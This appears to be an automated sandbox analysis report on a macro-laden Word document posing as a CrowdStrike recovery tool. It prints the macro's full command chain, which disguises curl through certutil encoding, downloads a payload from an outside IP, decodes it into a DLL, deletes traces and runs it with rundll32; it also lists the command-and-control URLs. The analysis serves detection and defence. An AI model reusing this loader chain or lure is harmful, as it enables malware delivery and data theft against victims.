Source: rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A7832A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500205273.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2520216865.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2530048667.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2450955120.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461645882.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540526722.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257938197.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2490004164.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416851318.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510132228.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479710584.0000020A783B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:5000/Uploadss
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:8099
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/pay
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/pay0
Source: curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767652303.0000000003170000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt-oC:
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt6
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txt6ov
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txto
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txton
Source: curl.exe, 00000021.00000002.2767652303.0000000003178000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txtr
Source: curl.exe, 0000000D.00000002.2189505676.00000000033E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.104.160.126:8099/payload2.txts
Source: vbaProject.binString found in binary or memory: http://172.104.160.126:80X99
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: document.xmlString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/P
Source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: rundll32.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767307922.00000000008A0000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: curl.exe, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/docs/sslcerts.html
Source: curl.exeString found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.ecosia.org/newtab/
Source: V2ViIERhdGE=.16.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49325
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49325 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49213
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49213 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49213 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49233 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49325 version: TLS 1.2
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,

System Summary

barindex
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, API IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0:Integer,False)
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: JbxHook_Run_3__ob = jbxthis.Run(jbxparam0, jbxparam1, jbxparam2)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: ' Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: dir = Environ("temp")
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXECOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\rundll32.exeFile deleted: C:\Windows\Temp\SGlzdG9yeQ==Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_00871535
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0089A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0088C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0086E127
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008ACAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008B33B0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_00874415
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_008825B8
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C19250
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C95204
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C291B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF5730
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C9B7E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C95A60
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C2F940
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92CAFA20
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C99CA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEFE10
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF6120
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C1A0A0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2210
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEEAA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF2E60
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEED05
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF0DA0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C231D0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C25170
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF5160
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C1B190
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C496B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C515E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C09960
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C2BCB0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C23DE0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE330
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BEE140
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C5E0B0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C32080
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C96250
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3C160
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE710
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C3A7E0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C947A0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C747C0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE520
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C04540
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C36460
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64B30
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BF4BC0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C96B6E
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92BFE900
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C00860
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C16A00
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C64CF0
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C66E50
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C96E10
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C94D80
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00841535
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0086A8D8
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084A9B3
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0085C1FD
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0083E127
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0087CAA0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_0084FAEC
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008833B0
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_00844415
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 33_2_008525B8
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
Source: ~WRC0000.tmp.26.drOLE, VBA macro line: Sub Document_Open()
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, VBA macros: true
Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
Source: turabian.xsl.0.drOLE indicator, VBA macros: true
Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
Source: gostname.xsl.0.drOLE indicator, VBA macros: true
Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
Source: sist02.xsl.0.drOLE indicator, VBA macros: true
Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
Source: gb.xsl.0.drOLE indicator, VBA macros: true
Source: iso690.xsl.0.drOLE indicator, VBA macros: true
Source: chicago.xsl.0.drOLE indicator, VBA macros: true
Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
Source: CatalogCacheMetaData.xml.26.drOLE indicator, VBA macros: true
Source: ~WRC0000.tmp.26.drOLE indicator, VBA macros: true
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmStream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit
Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{43F4B375-8E7A-44EF-86E3-6C5BC465D1F2}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: CatalogCacheMetaData.xml.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{085F5DEF-FD43-4377-836E-D631451649D2}.tmp.26.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C915E0 appears 132 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C26F90 appears 415 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15F20 appears 56 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C2B840 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C20ED0 appears 71 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15810 appears 68 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C97390 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92BEAA50 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C27080 appears 332 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90F70 appears 42 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C15FF0 appears 35 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91110 appears 87 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C91570 appears 266 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C157A0 appears 36 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92CABF00 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C127F0 appears 47 times
Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFD92C90FF0 appears 434 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087201D appears 39 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D632 appears 246 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0083913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00842564 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008720E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0084251E appears 48 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D6AD appears 303 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0086913E appears 64 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 008420E6 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 0087D632 appears 247 times
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: String function: 00872564 appears 48 times
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOCM@69/284@2/4
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0086310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{EDECE918-A2EA-49DC-A414-445477A4F37D} - OProcSessId.datJump to behavior
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmOLE indicator, Word Document stream: true
Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.drOLE indicator, Word Document stream: true
